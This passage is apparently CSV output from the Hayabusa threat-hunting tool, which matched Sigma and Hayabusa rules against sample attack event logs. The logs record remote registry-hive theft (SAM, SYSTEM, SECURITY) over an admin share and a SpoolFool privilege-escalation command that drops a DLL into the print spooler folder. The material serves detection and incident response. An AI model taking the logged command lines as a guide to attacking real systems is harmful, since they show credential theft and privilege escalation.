0x567515,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.520 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.521 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx 2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx 2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx 2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx 2022-02-20 02:35:16.328 +09:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,../hayabusa-rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx